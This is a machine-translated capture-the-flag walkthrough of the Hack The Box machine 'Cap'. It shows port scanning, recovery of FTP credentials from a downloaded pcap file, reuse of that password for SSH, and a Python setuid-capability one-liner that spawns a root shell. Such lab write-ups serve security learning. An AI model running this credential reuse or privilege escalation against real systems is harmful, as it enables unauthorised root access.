current position:Home>[HTB] cap (datagram analysis, setuid capability: Python)

[HTB] cap (datagram analysis, setuid capability: Python)

2022-02-01 15:20:49 Antenna pot

disclaimer

The host penetrated by this article is legally authorized . The tools and methods used in this article are limited to learning and communication , Please do not use the tools and ideas used in this article for any illegal purpose , All consequences of this , I am not responsible for , Nor shall it be responsible for any misuse or damage caused .

Service detection

┌──(rootkali)-[~/htb/cab]
└─# nmap -sV -Pn 10.10.10.245
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-28 08:33 EST
Nmap scan report for 10.10.10.245
Host is up (0.35s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    gunicorn
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :

 Copy code 

Service enumeration analysis

ftp Anonymous login is not allowed

Nothing was found in the blasting catalogue

80 Service opening is a background like network management ( No need to log in ), It shows three columns corresponding to ifconfig,netstat And intercept Traffic Services ( You can download the target pcap file )

It seems that the main attack point is 80 port

The user name in the background is :nathan

stay http://10.10.10.245/data/1 This page every 5 One second will update pcap file , You can download the latest file at the current time , The cycle range is 1-5

But the files with login information are hidden in 0 In Document No , That is to say http://10.10.10.245/data/0

Isn't surprise , No surprise ?

The first 0 individual pcap Download the file locally , use wireshark open

The first 36 Datagrams found ftp user name :nathan

The first 40 Datagrams found ftp password :{ Not tell you }

Sign in ftp

┌──(rootkali)-[~/htb/cap]
└─# ftp 10.10.10.245
Connected to 10.10.10.245.
220 (vsFTPd 3.0.3)
Name (10.10.10.245:root): nathan
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    3 1001     1001         4096 May 27  2021 .
drwxr-xr-x    3 0        0            4096 May 23  2021 ..
lrwxrwxrwx    1 0        0               9 May 15  2021 .bash_history -> /dev/null
-rw-r--r--    1 1001     1001          220 Feb 25  2020 .bash_logout
-rw-r--r--    1 1001     1001         3771 Feb 25  2020 .bashrc
drwx------    2 1001     1001         4096 May 23  2021 .cache
-rw-r--r--    1 1001     1001          807 Feb 25  2020 .profile
lrwxrwxrwx    1 0        0               9 May 27  2021 .viminfo -> /dev/null
-r--------    1 1001     1001           33 Nov 28 15:32 user.txt
226 Directory send OK.

 Copy code 

We successfully logged in to ftp, Seems to be nathan User home Catalog , See that there is user.txt, But we don't have permission to read .

initial shell

Many lazy administrators are used to using the same login information for various services , Try to login to with the login credentials above ssh

┌──(rootkali)-[~/htb/cap]
└─# ssh [email protected]                                       
The authenticity of host '10.10.10.245 (10.10.10.245)' can't be established.
ECDSA key fingerprint is SHA256:8TaASv/TRhdOSeq3woLxOcKrIOtDhrZJVrrE0WbzjSc.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.245' (ECDSA) to the list of known hosts.
[email protected]'s password: 
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun Nov 28 16:00:07 UTC 2021

  System load:  0.0               Processes:             225
  Usage of /:   36.6% of 8.73GB   Users logged in:       0
  Memory usage: 21%               IPv4 address for eth0: 10.10.10.245
  Swap usage:   0%

  => There are 2 zombie processes.

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

63 updates can be applied immediately.
42 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Thu May 27 11:21:27 2021 from 10.10.14.7
[email protected]:~$ pwd
/home/nathan
[email protected]:~$ ls 
user.txt

 Copy code 

Get user.txt

Raise the right

Pass on linpea, Find out python Yes setuid The ability of

/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
 Copy code 

use python Raise the right

[email protected]:~$ /usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/sh")'
# id       
uid=0(root) gid=1001(nathan) groups=1001(nathan)
# whoami
root

 Copy code 

copyright notice
author[Antenna pot],Please bring the original link to reprint, thank you.
https://en.pythonmana.com/2022/02/202202011520475088.html

Random recommended